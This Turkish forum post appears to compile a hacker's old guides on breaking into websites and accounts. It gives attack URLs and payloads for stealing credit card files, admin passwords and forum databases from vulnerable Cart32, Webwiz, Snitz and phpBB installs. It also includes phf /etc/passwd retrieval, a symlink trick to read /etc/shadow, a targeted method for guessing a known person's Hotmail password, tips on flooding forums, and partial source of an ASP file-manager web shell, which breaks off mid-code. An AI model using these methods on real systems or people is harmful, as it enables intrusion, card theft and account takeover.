Mesela, ?search=actin yerine ?action=search olabilir. yada direkt ?search de olabilir bunu bilmeyeiz bu yüzen deniycez. Mesela keywords yerine keyword de olabilir. Sonuç URL Hire Workers Online! ye%20&template=order.log
şu ana kadar anlattığım Shopper.Cgi için olan açıktı. Birde Cart32.exe gibi windows için hazırlanmış olan scriptin açığı var. Onun hack edilmesi daha kolay.Cart32 kullanan bir sitede http://www.michaeljackson.com/cgi-bin/cart32.exe olarak scripti bulduğunuzda, bunu http://www.michaeljackson.com/cgi-b...herhangibisi-OR DERS.txt yada OUTPUT.txt olarak girerek CClere ulaşabilirsiniz. Tabii dediğim ORDERS başka bişi de olabilir ama genelde orders dır.
Ayrıca Cart32 de CC dışında:
Admin şifresi için-> http://www.michaeljackson.com/cgi-b...t32/)cart32.ini
Müşteri şifreleri için-> http://www.michaeljackson.com/cgi-b...cart32clientlis t
Bilgisyar Klasörünü görüntülemek için->
http://www.michaeljackson.com/cgi-bin/cart32/error
Unutmayın, michaeljackson.com yerine Vulnerable olan scriptin bulunduğu site adresi yazılacaktır. Pathler değişebilir ama v4.00 a kadar olan tüm scriptlerdeki açık aynı yöntem ve komutlarla sabit kalır.”
işiyi Kandırma: Yöntemlerin en ilginci budur J Karşınızdaki kişiyi, bir şekilde kandırıp, ondan bir mail şifresi yada buna benzer bir şey (gizli soru cevabı) alınarak şifreye ulaşma yoludur. Tavsiye edilmez....
Brute Ve Dict. Force: Bir dosya içine yazılmış şifrelerin bir programla denenmesi işlemine Dictionary Attack, var olabilecek tüm şifre kombinasyonlarının denenmesi olayına Brute Force Attack denir. Bu iki yöntem çok uzun sürecek yöntemlerdir. Eğer ki bekleyecek bir kaç yüz yılınız varsa sonuç alabilirsiniz J Ama hiç belli olmaz, kısa zamanda da sonuç alınabilir, hiç sonuçta alınmayabilir.
şimdi bir Dictionary Attack için şifre hazırlamak isteyenlere 2001 yılında yazmış olduğum şifre kırma mantığı ile ilgili yazımdan bir alıntıyı koymak istiyorum.
------------------------------------------------------------ ----------------------------------
“... ışte bu deneyeceğiniz şifreleri hazırlamada yardım edecek bir kaç şey anlatmak istiyorum. Bunları şu güne kadar yaşadığım olaylardan esinlenerek yazıyorum.
şimdi diyelim ki X (12-03-1984) yaşında olan Ali adında birinin Hotmailini kıracağız. Bu adamı az buçuk tanıyoruz. Mesela aynı okulda aynı sınıftasınız, ne kadar bu işlerden çaktığınıda biliyorsunuz. O zaman başalyalım. Bu adamında soyadı Veli olsun yani Ali Veli. Cep telefonuda 0 535 543 21 09 olsun.
Bu adam en basitinden şifresini bir 1984 koymak ister sonra olamdı der 19841984 koymak ister o da olmadı 12031984 koymak ister. Bunlarla doğum tarihine göre kombinasyonlar yapabiliriz. Daha çok seçenek var. En çok 19841984 tutar. Bu adamın şifresi 05355432109 olabilir. Yada 5432109 olabilir.
şifre VeliAli olabilir AliVeli olabilir, babasının adı Ahmet olsun, AhmetVeli olabilir. VeliAhmet olabilir. AlVel olabilir.Aliv84 olabilir. yada Galatasaraylı olsun benim gibi, o zaman GS84 olabilir. aliGS84 olabilir. AGS84 olabilir. Yada ev telefonuda olabilir.
Diyelim ki gizli sorusunu bulucaz. Soru yanlızca "ALIM" diye bir kelime. O zaman onun cevabı yukardakinin aynısı yani "ALIM" olabilir.
Yada şifre yedi tane 7 , üç tane 3 de olabilir. 54321 olabileceği gibi 123456789 da olabilir. 0000 da olabilir 9876543210 da olabilir.
Oturduğu apartman, şehir, sokak isimleride kullanılır. Annesinin kızlık soyadı. Yada okul numarası. Sonuçta kişi unutmamak için herkesin bildiği ve kullanı.. bazı numaralardan ve isimlerden bir kombinasyon yapmak isteycektir. Bizim burda yapmamaız gereken burda bu kişiye göre yapılabilecek kombinasyonları tahmin edip bir sözlük hazırlayarak. Dict. attack yapmak olacaktır. Baya uzun süren bir iş olabilir ama bu tarz şifreler kullanan biriyse kesin düşer zokaya.
Mesela bazı klavye oyunları vardır. Q klavyeler QWERTY harfleriyle başlar, bunlar rahatlıkla şifre olabilir. Yada QAZWSXEDC harfleride olabilir. Bakın bakalım bu harfler klavyede nasıl dizilmiş?
Yada rakamlardan 98745632210 olabilir. Bu sizin düşünce kabiliyetinize bağlı daha çok üretebilirsiniz.
Bu tarz klavye oyunlarıyla hazırlanmış, ayrıca kişiye özel olarakta hazırlanmış bir sözlüğün; sanıyorum ki başakalarının şifrelerini bulmakta büyük yararı olur, ki oluyor zaten.
Bazen şahıslar en sevdikleri hayvanı, eşyayı, şarkıcıyı, futbolcuyu falanda yazarlar.
Demek ki şahsi olan biligilere ve klavye oyunlarına dikkat etmemiz gerekiyormuş. Önemli olan kişi için kolay hatırlanabilecek bir şey yazmak. Herkes şifrelerini bu mantıkla bulur. Eminimki bu yazıyı okuyanlardan, yani sizlerden birileri de burda kendi şifresinin formülünüde görmüştür. Dedim ya herkes bu tarz şeyler kullanıyor. Ama bilmiyor ki bu yöntemleri bazıları zaten biliyor. ınsan mantığı işte, her yerde aynı...”
Bilgisayar Bilimiyle uğraşan yada bu işlerden daha çok anlayanların kullandılkları yöntemler:
Bu kişiler yukardaki yöntemleri kullanabilir ama yukardaki bilgileri kullanabilen kişiler bu yöntemleri kullanamaz...
Enjeksiyon Yöntemleri: Bilinen scriptler veya bilinmeyen scriptler içindeki açık ve hataları kullanarak, bir database’e kod girme yada benzeri bir kodun çalışmasını sağlamaktır. Örnek vermem gerekirse, 2003 mayıs ayında, bir siteyi bu yöntemle hack etmiştim. Site bir arama motoru koymuştu. Arama motorunda yazdığınız kelime en son arananlar diye bir liste çıkıyordu ve orda da ana sayfada gözüküyordu. Ancak aramaya girilen kelime “, \, /, <, > içerse bile bu içerilen HTML koduna aynen yazılıyordu. Yani Special Chars dediğimiz bu karakterler doğal halleriye yazılıyor &NbSp; gibi özel HTML dili ile yazılmıyordu. Bende arama kısmına ufak bir Java Script yönlendirme kodu girdim ve anasayfayı spymastersnake.org’a yönlendirdim. Böylece o siteye giren kişi 1 saniye sonra direkt bizim siteye yönlenmiş oluyordu.
Bu örnekte olduğu gibi, bazı forum scriptlerinin kullandığı DataBase’lere bazı kodlama hatalarından yararlanarak, değerler girilebiliyor. Bunların en ünlülerinden birisi, 2002 yılında bulunan Snitz forumları açığıdır.
Permission Açıkları: Gerek HTTP gerek FTP üzerinden olsun, bu açıklar her şekilde risk oluşturur. En güvenli sistem, Unix/Linux sistemidir. Bildiğiniz üzere Multi-User işletim sistemlerinde, bir dosyaya sizden başka kimin ulaşıp, ulaşamayacağını ayarlayabileceğiniz, Kernel tarafından yönetilen bir Permission Tablosu vardır. Linux ile bir örnekle açıklayayım:
Bir Linux makinada benim Home klasörüm “gokhan” olsun ve yolum aşağıdaki gibi olsun:
ıçinde de MichaelJackson.mp3 diye bir dosya olsun.
“ /etc/home/gokhan/spymastersnake/MichaelJackson.mp3”
Burdaki “etc” klasörü herkesin okumasına açık, ancak yazma işlemlerine kapalı bir klasördür. Ben klasörün içeriğini görebilirim ama içine dosya koyamam. Diyelimki “etc” altında BeatIt.mp3 isimli bir dosya olsun. Klasörün herkese açık okunabilir READ ayarı açık oldukça bu dosyayı alabilirim. Eğerki Herkese açık EXECUTE ayarı açıksa ben bu dosyayı Shell den komut girerek bir mp3 playerla açabilirim. Eğerki Dosyanın READ ayarı herkese kapalı ise ben sadece bu dosyayı okuyamam. Aynı şekilde dosyanın READ ayarı açık olursa fakat klasörün READ ayarı kapalı olursa “etc” klasörünün içi boş görünsede dosyanın direk yolu yani “/etc/BeatIt.mp3” girilirse ben bu dosyayı okuyabilirim. ışte burda anlattığım klasör ve dosya Permission ayarlarında bir kullanıcı bir klaörün READ ayarını kaldırarak o klasörün içindeki bir dosyanın erişime kapalı olduğu sanmaktadır. Halbuki burda erişime kapalı olan klasörün içeriğidir. Yani TOC dediğimiz Table Of Contets öğesidir. Ki bu öğe yine KERNEL tarafından düzenlenir. Elbette bu anlattıklarım Web serverları üzerinden yaptığınız istemler için değil, makinada sahip olduğunuz shell ile yada FTP ile yapabileceğiniz şeyler.
“gokhan” klasörü burda sadece benim grubuma yada bir değişle sadece bana açık olan kısımdır. Öyleki sadece yazma yetkisi Group ve Admin elindedir. Eğerki biri bu ayarı herkesin yazıp okuabileceği moda getirirse, bu “gokhan” klasörü halka mal olmuş umumi bir klasör olur J Ve sonuçta altında bulunan tüm dizinler riske girer. Bu tarz Permission hataları ile hacklenen yada veri kaçırı.. sitelerin sayısı saymakla bitmez. şu an hala Kredi Kartları çalınabiliyorsa bunun nedeni bu ayarların yapılamamasıdır.
Bir klasöre uyguladığınız izin ayarı, sadece o klasör’ün TOC’i içindir. ıçindeki bir dosya bundan etkilenmez. Fakat dosyanın EXECUTE edilebilmesi gibi klasörün durumununda sorulduğu zamanlarda bu önem taşır. Bir dosyanın edit edilmesi demek, o dosyanın silinip yerine bir yenisini yazmaktan farksızdır, bu yüzden Write izni açık olmayan bir klasördeki dosyayı editleyemezsiniz yada klasöre yeni dosya koyamazsınız. Permission ayarlarını bilmeyen yada detaylı bir webmaster için son her zaman 1 adım yakındadır. Nitekim bu ayarları bilmeden “Forum Kuracam” diye ortalığa çıkan ve her ne hikmetse her önüne gelenin forum kurduğu bir ülkede, bu ayarlardan çıkan açıklar önem taşımaktadır.
Eğer bir yerden host almışsanız, o makinada bir hesabınız var demektir ve komut çalıştırabilirsiniz demektir. Bunu yapmak için scriptler birebirdir. Eğer ki SSH yetkiniz varsa bunu SSH Shelli üzerinden yada Telnet varsa onun üzerinden de yapabilirsiniz. Bunu en güzel örneği bir scriptle komut çalıştırmak için PHPde şudur..
PHP
--------------------
<?
system(komut);
?>
--------------------
Bir çok bilimsel bilgisi eksik kişi, bu olayı ASP için düşünerek, bunun bir açık olduğunu sanmaktadır. Ve adına FSO açığı demektedir. Halbuki bu bir açık değildir. Size verilen bir haktır.
şimdi size 2001 yılında yazmış olduğum, Web Hack dökümanından bir alıntı ile konuyu açacağım.
------------------------------------------------------------ ---------------------------------
“......... Bir baktım ki onlarda bizim formumumuz olan IKONBOARD un aynısını kullanıyor. Neyse baktım xxxxx benim türkçeleştirmediği yerleri de türkçeleştirmiş forumun. Bende benim forumdan ve onun forumdan ona PM attım ve bu dosyaları istedim. Bana vereceğini söyledi, aradan vakit geçti dosyaları alamadım çünkü xxxxx sanıyorum ki evinde değilmiş şehir dışındaymış.
Bende baktım olmuyor bekle bekle, Allah'a şükür bu işlerden anladığım için hemen yapmam gerekeni yaptım ve onun bana yollayacağı dosyaları kendim aldım... nasıl mı?
Ben ikonboard'un dil dosyalarını falan nereye kurduğunu biliyorum. Yani tüm klasörlerin nerede ve hangi isimle olduğunu biliyorum. Çünkü bende ikonboard kullanıyorum. Bende madem öyle dedim, ve forumun dil dosyalarını indirmeye başladım yaptığım şu idi. Mesela hata mesajlarını bulunduran dil dosyasını istiyorsam http://www.siteadı.com/cgi-bin/ikon3/...en/ErrorWords.p m yazmam yeterli. Dan diye ben bu dosyayı download edebiliyorum.
ışte ben böylece tüm dosyaları download ettim ve gördüm ki onun forum ile benim forum farklı versiyonmuş dosyalar uyuşmadı.
Herneyse ben istediğimi aldım ama iyi bir insan olarak. Peki diyelim ki ben kötü biriyim ve neler yaparım. ılk yapıcağım iş forumun DATABASE dosyasını ele geçirmek olacaktır. Bu sayede ben tüm forumdaki kullanıcılara şifrelere ve maillere ulaşabilirim. Bu kadar basit! Ha bu şifereler HASH edilmiş olacağından siz okuyamazsınız bunları. Bunu CRACK etmeniz gerekir. Tabii ben okurum bunları. Olay basit aklını kullanacaksın.
Kendi bilgisayarımdaki COOKıE dosyasını açarım(programla), Forum adminin ID sini ve HASH edilmiş şifresini o databaseden alırım ve kendi COOKıE dosyama koyarım. Forumun sayfasına girince bir bakarım ki ADMıN olarak forumdayım. Daha sonra admin şifresini değiştiririm
Sonrada sitenin tamamını hack ederim. Bu da basit en önce aldığım şifre ile FTP de bir deneme yaparım. Baktım olmuyor, bu forumların File Managerları var, isteyin dosyayı Admin odasından siliyorsun değişitriyosun falan. Ona girerim ve gerisini siz düşünün artık. Bu iş bu kadar kolay! Bütün bir site bir anda ufak bir hata ile elinizin içine düşebilir....”
------------------------------------------------------------ ---------------------------------
Gördüğünüz gibi en ufak hata yada unutkanlık dediğiniz şey bile, bu işi bilen kişilerin eline geçtiği andan bir şeylerin sonu olabilir. Yukarda bahsedilen örnek büyütülerek, aynı host altında bulunan başka sitelerinde zarar görebileceği bir hale sokulabilir! Elbette bu şans gerektiren bir durum olur ama bu tarz olayların yaşanabileceği bir gerçektir.
Host Deface: Bir host gözde abartılacak bir sistem değildir. Hatta çoğu dedicated bir FireWall ile korunmaz bile. Çoğu 3-4 bilgisayardan oluşan amatör düzeyde hostlardır. Sadece bir kaç büyük firma, odalar dolusu büyüklükte Dedicated host makinlarına sahiptir. Ama bu onların açığı olmayacak anlamına gelmez. Açığı buluncak kadar büyük olmasa bile mutlaka saldırılara dayanma sınırları vardır. D.o.S dediğimiz saldırılara karşı bir çoğu kendini bazen yenik halde bulabilir. Hemde var olan FireWalllarıyla beraber. Peki nedir D.o.S?
D.O.S (Denial of Service) dediğimiz ataklar, T1 T3 dediğimiz yüksek bağlantılı makinalar yada basit Win tabanlı ve Dial-up tabanlı makinalar tarafından yapı.. ping gönderme aşırı paket yollama ve BandWitdh dediğimiz sınırlamalı veri transferi dediğimiz olayın üstüne çıkarak Rate Limit Exceded gibi server hataları almamızı ISPden kopmanızı ve bağlantımızın crash olmasını sağlayan NUKE de dediğimiz ataklardır. Bu atakları herkes programa ihtiyaç dumadanda yapabilir ama bu iyi bir bağlantı ve Win atağı değilse Unıx gibi sağlam bir sistem gerektirir. WinXP ve 2000 bu ataklar için önlem almış sistemlerdir ve internete hızlı bağ..ırlar. Daha çok bilgi için Buaraya Bakın. Kısaca D.o.S bir server’a karşılayabileceğinden fazla istek ve paket yollama durumudur. Bu durumda sunucu programı kilitlenir ve iyi kodlanmamış stabil olmayan bir server programı ise hata verip kapanabilir. Ve o site siz bunu yaparken devre dışı kalır. Düşük bağlantılı bir bilgisayar ile yapı.. D.o.S her zaman yüksek bağlantılı makinaları kullanarak olmak zorundadır. Bunun içinde başka bilgisayarlar kullanılır.
D.o.S benzeri başka ataklarda vardır. Bunlarda paket yollama yerine bir URL yada POST metodu için yüzlerce istek üretir. Bunlarda Flood programları denir. Bunların bir link’e tıklanması için hazırlanan versiyonlarına Clicker denir. Bu üç program türünün ve saldırı türününde mantığı aynıdır.
Bir forumun Search bölümüne yapacağınız binlerce istek o forum scriptinin ve hostun size ayrı.. CPU bölümünün, istekleri artık daha geç karşılamasına ve bazende database’in bir hata ile çökmesine neden olabilir. Buda veri kaybı demektir. Bir forum scriptini yavaşlatıp hata vermesini sağlamak için, en güzel yöntem arama kısmında aynı anda yüzlerce arama yaptırmaktır. Çünkü arama işlemi database’i en çok yoran ve tht cpu harcayan işlemdir.
Aynı şekilde çoğu kez bir çok Host makinasında, farkında olmadan açık unutulan Control Panel arayüzleri ve benzeri Shell tarzı, Telnet tarzı sunucular olmaktadır. Bu tarz kullanılmayan sunucuların portlarını bulmak ve portlarından bir mesaj alarak hangi programın çalıştığını bulup şifre denemek, açık denemek en mantıklısıdır.
Bir FTP server’ına bağlandığınızda bazen sizin home klasörünüz dışındaki bir klasöre çıkmanıza izin verilir. Ama çıktığınız klasörlerin içini boş görürsünüz. Eğerki bazı Full Pathler bulursanız, bu tarz serverlar içinde diğer kullanıcıların home klasörlerine ulaşabilirsiniz.
Ayrıca bu kısımda incelenecek bir diğer kısım ise Vulnerabilites dediğimiz, korumanın zayıf noktalarını bize veren programlama hatalarıdır. Örneğin, Apache serverlerinda, kodlamadan çıkan bir hata size o server'a saldırma, sızma gibi imkanlar sağlayabilir. Aynı şekilde sürekli yama çıkarılması nedeniyle yamalı gömleğe dönen Windows 2000 de bulunan bir güvenlik açığı, size bir çok kapıyı açacaktır. Bu tarz açıkları, "securityfocus" gibi güvenlik haber sitelerinden takip edebilir, veya kendiniz sistemde denemeler yaparak yeni açıklar bulabilirsiniz.
Benim kendi kendime deneyerek bulduğum açıklar oldu, hiçbirini de program sahiplerine yada güvenlik haber sitelerine iletmedim. Ancak bu işleri yapıp, bu haberleri veren bir çok kişi bulunmakta. Ve çoğuda News yada Mail gruplarına üyedir. Eğer bir açığı herkesten önce öğrenmek istiyorsanız bu yerlere üye olunuz. Yanlış bilgilerle olduğunuz yerde saymak istemiyorsanız, Türkiye'de ki Hack adı altındaki sitelerin Hiçbirini sıkı bir şekilde takip etmeyiniz.
Çünkü bu siteler yanlış bilgi yanında, sürekli kavga, gürültü ve basit bilindik şeyleri söyleyip, güncel güvenlik gelişmelerini barındırmamaktadır. 2004'ün Mart ayı itibariyle baktığım hiçbir Hack sitesi, kendi adıma söylemem gerekirse, onay verilecek düzeyde değildi.
Bu işlerde ilerlemek isteyenlerin ilk işi, o siteleri bırakmak olmalıdır. Haftada 1-2 kez hepsini kolaçan etmek, sizin açınızdan faydalı olacaktır. Geri kalan vakitte ise sürekli ingilizce kaynaklardan yazılar okuyarak ve düşünüp, uygulama yapmalısınız.
Exploitler: ışin hem bilgili hemde bilgisiz kısmına hitap edebilen tek bölümdür. Exploit ingilizce bir kelime olup, anlamı “Sömürme” dir. Burda sömürülen şey, bir host’un size açmış olduğu yetenek ve olanaklardır. Örneğin bir host size Shell uygulamaları çalıştırmanıza izin veriyorsa ve siz bu izinle bir D.O.S programını saldırı yapmak için kullanıyorsanız bu bir Exploittir. Aynı şekilde, o hostun hack edilmesini sağlayacak, Kernel’e zarar verecek bir program açıyorsanız, yada bir MySQL serverına bulduğunuz şifre ile bir bilgi girecek yada bir bilgi alacaksanız ve o sistemi hack etmeye çalışcaksanız buda bir Exploittir. Kısacası, host’un yetenekleri ile, kendisi dahil olmak üzere, bir sistemde istenmeyen bir iş yapacaksanız, bu Exploittir. Bir hosting firmasından host alırken size bir sözleşme imzalatırlar. Bu sözleşmede, bir program çalıştıramıyacağınız yada bir server daha kuramayacağınız gibi şeyler yazar. Yani tüm host sağlayanlar sizin yapabilecklerinizin farkındadır ama çoğunlukla bu sözleşmeleri okumayan sizler onların farkında olmadığını sanırsınız.
Explotiler internette özellikle *.pl uzantılı Perl scriptleri halinde dolanırlar. Esas görevleri içinde kodlanmış olan şeyleri yapıp size bir kapı açmaktır. Bu işleri bilmeyenler bu hazır scriptleri alır ve kullanırlar. Bilen kişiler ise kendileri düşünüp, bu scriptleri yazarlar. Yukarlarda bir yerde verdiğim bir hosttan tüm userların hack edilmesi örneğinde kişinin yazacağı script yada program bir Exploit niteliği taşır. Çünkü tüm userların home klasöründeki indexleri değiştirmektedir. Ancak bu exploitlerin en güzeli Kernel’in işlevini bozmak için yazılanlarıdır. Öyledir ki, bir dönem WinNT için her normal user’a Administrator yetkileri atayan bir exploit bulunmuştu. Bu exploit açıldığı anda sistemi Unstable yapıp makinanın tekrar başlamasını sağlıyordu. Daha sonra ise kernel deki Permission sistemi bozuluyordu. Fakat burda unutulmaması gereken kısım, exploiti harekete geçirecek olan *.exe dosyasını açabilme yetkinizin olması. Ayrıca o *.exe dosyası da Token Proccess olan Privilige ayarlarını yapabilmeli. Aksi halde bir exploiti çalıştırıp Kernel’e zarar vermek kolay değildir.
Domain Hack: Hack etmeye çalıştığınız sitenin domanini elde etmek, bir şekilde onu devre dışı bırakmak en zor olanıdır. Bunun için bir şekilde domainin şifresi, domainin Registrar’ının açığının yakalanmış olması gerekir. Eğerki böyle bir şey yapılabilirse, o site ömür boyu size ait olabilir. Bunun yöntemleri çok fazla değildir ancak sonuç alma ihtimali az olduğu için fazla üzerinde durulması anlamzsızdır. Ancak böyle bir ihtimal ve yöntemin olduğunu bilmeniz size avantaj sağlayacaktır.
Yukarıda anlatılmış olan 10 yöntem grubundan elbette daha çok yöntem var. Ve hepside yetenek-zeka ikilisine dayanmakta. Ancak benim yukarda yazdığım 10 yöntem bunların en yaygınları. Bazı bir kaç özel, yaygın olmayan ama çok rahat kullanılabilen yöntemlerde var. Ancak onların böyle halka açık bir dökümanda yayınlamam imkansız. Ancak SpyMasterSnake ıleri Düzey üyeleri arasında paylaşılıp, geliştirilebilecek yöntemler bunlar. Bu yöntemlerde geliştikten sonra kullanılması ve anlaşılması kolay hale gelecektir.
Unutmayın ki bu işler sihirle yada değnek ile olmuyor. Herşey bir araştırma ve düşünme sonucunda oluşan şeyler. Bir gün 50 bin yada 150 site hackledik gibi bir site ile karşılaşırsanız şaşırmayın, onlar bu işlere yeni başlamış ve insanları çevrelerine toplamak isteyen kişilerdir. Bilgi almaya giderseniz, eliniz boş dönersiniz, çünkü olmayan bir şeyi almanız zor olur, olsa bile alabileceğiniz meçhuldur
ınbol tht ingilizce çalışın ve dilinizi geliştirin.
Hiçbir yöntemi veya programı (trojan) aşağılamayın, çok ufakta görünse bir açık, sonuçta açıktır ve gün gelip başınıza bela olabilir ingilizcesi iyi olmayan bir yada hiç olmayan birinin, bu işleri yapması kısaca imkansızdır.
evet arkadaşlar eski dökümanlarımdan derlediğim bu paylaşım hack konusunda umarım aydınlatıcı olmuştur
Dökemeseniz Bile Bu İşlerin Mantığını Bir parca Olsun Anlayabilirsiniz.
Bir siteyi hacklemek için kullanabileceginiz birçok yöntem var.Bunlardan bazilari:
*Güvenlik Aciklari(asp,php,cgi,phf vb. gibi)
*Exploitler
*Fso(NtDaddy),listpathler
*Bruteforce
*Wordlist
*Birebir Baglanti(trojanlar vs)
*Fakemail
*Flood
Simdi bunlari teker teker inceleyelim:
_____GUVENLIK ACIKLARI:_____
Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
forumunadresi.com - forumunadresi Resources and Information. This website is for sale! olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
http://www.forumadresi.com/snitz_forums_2000.mdb adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
http://www.siteadresi.com/db/main.mdb den database'e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar
/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi
Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari
.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t's CGI scanner'dır.
Php Sistemlerinin aciklari:
Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
/ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz.
bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
anlamaniza yardimci olacagina inaniyorum.
<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
Cgi scriptleri acigi:
WEBBS de bulunan bir acik.
http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/
Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
Açık : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt
WWWBoard Scriptleri:
Açık : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açık : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açık : http://www.hedefsite.com/webboard/password.txt
Biraz da phfden bahsetmek istiyorum:
96'da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
http://kiracagimizadres/cgi-bin/phf...0a/bin/cat /e tc/passwd yaziyoruz browsera.ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:
www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
yada
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.
_____EXPLOıTLER:_____
Çok kullanicili isletim sistemlerinde,sitelerde size bir boslugu kullanarak özel yetkiler vermek icin yazilan programlara
exploit adi veriyoruz.Exploit bize belirli bir sistemde yöneticilik ünvani verir.Bu ünvanlar NT'de administrator,Novell'da
supervisor,UNIX de clone yada root olarak siralanabilir.ıki tür exploit bulunur bunlar remote(sistemin parcasi olmadan
kullabileceginiz exploitler) vede local(kullanmak icin sistemin bir parcasi olmaniz gerekenler) olarak siralanabilir.
Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır.
Bagzi örnek exploitler vermek istiyorum :
"overflow" exploiti (FreeBSD'de lprm açığı):Overflow exploitler SecuriTeam.com - A Free Accurate and Independent Source of Vulnerability Information adresinde tht bulunmaktadir.Pointer
artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon
belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir
yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir
iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root"
erişimi sağ..ır. Lokal bir exploittir.
Derleyici ve /tmp Hataları (Solaris'de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde
/tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link
(bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows'taki .lnk dosyaları gibi) oluşturulur ve bu
linkten yararlanarak lokal root hakkı alınır.
Program Hataları (Linux'daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur.
Bu hatayı linux'ta şöyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl
Bu komutları yazdıktan sonra X11Amp'i çalıştırıp "ekl" 'yi seçin bütün girişleri seçip silin. Program çakılacak ve
/etc/shadow dosyasını alabileceksiniz.
Microsoft'un FrontPage Server Extensions'unda karşılaşı.. açıklar: Frontpage extensions'un kullanıldığı web sitelerinde
pek çok açık bulmak mümkün, örneğin Frontpage 98'de dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini
"WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
Exploit uygulamali kullanimi icin size ayrica bir döküman hazirlayacagim
_____FSO(NTDADDY),LISTPATH:______
Çoğumuz elmali şeker yada sadece şeker diye tanidik.Bir hostta kiralanan bir yere upload edilen bir asp kodudur.Bize Hosttaki tüm
domainlere erişim hakki saglar.Piyasada bir çok FSO kodu bulabilirsiniz.Belesh domain ve hostlarda bosuna denemeyin ise
yaramaz.Yeni listhpathler icin sık sık hack sitlerini ziyaret etmenizi öneririm.Çok yakinda üzerinde oynamalar yaptigim
süper bi şekeri da piyasaya sürücem.Simdilik bekleyin.Bu methodun bütün hostlarda calismasi konusunda
garanti veremem.Ama size su an icin kullanabileceginiz bir kac FSO kodunu cok yakinda sitede yayinlayacagim.Buna özel
ayri bir döküman da sitemizde mevcuttur(by alca.).
Örnek bir Fso kodu yaziyorum.Su an Calisip calismadigindan emin degilim ama ileri derecede asp biliyorsaniz isin
mantigini kaparsiniz
<%@ Language=VBScript %>
<%
Option Explicit
Dim giCount
Dim gvAttributes
Dim Ext
Dim ScriptFolder
Dim FolderPath
Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File
Dim BgColor, BackgroundColor,FSO
If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFolder Request.QueryString("CopyFolder") & "*", "d:"
End If
If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"),
"d:"
End If
Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
FolderPath = Request.QueryString("FolderPath")
If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If
FolderPath = ParseFolder(FolderPath)
ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLAT ED")) & "images"
%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
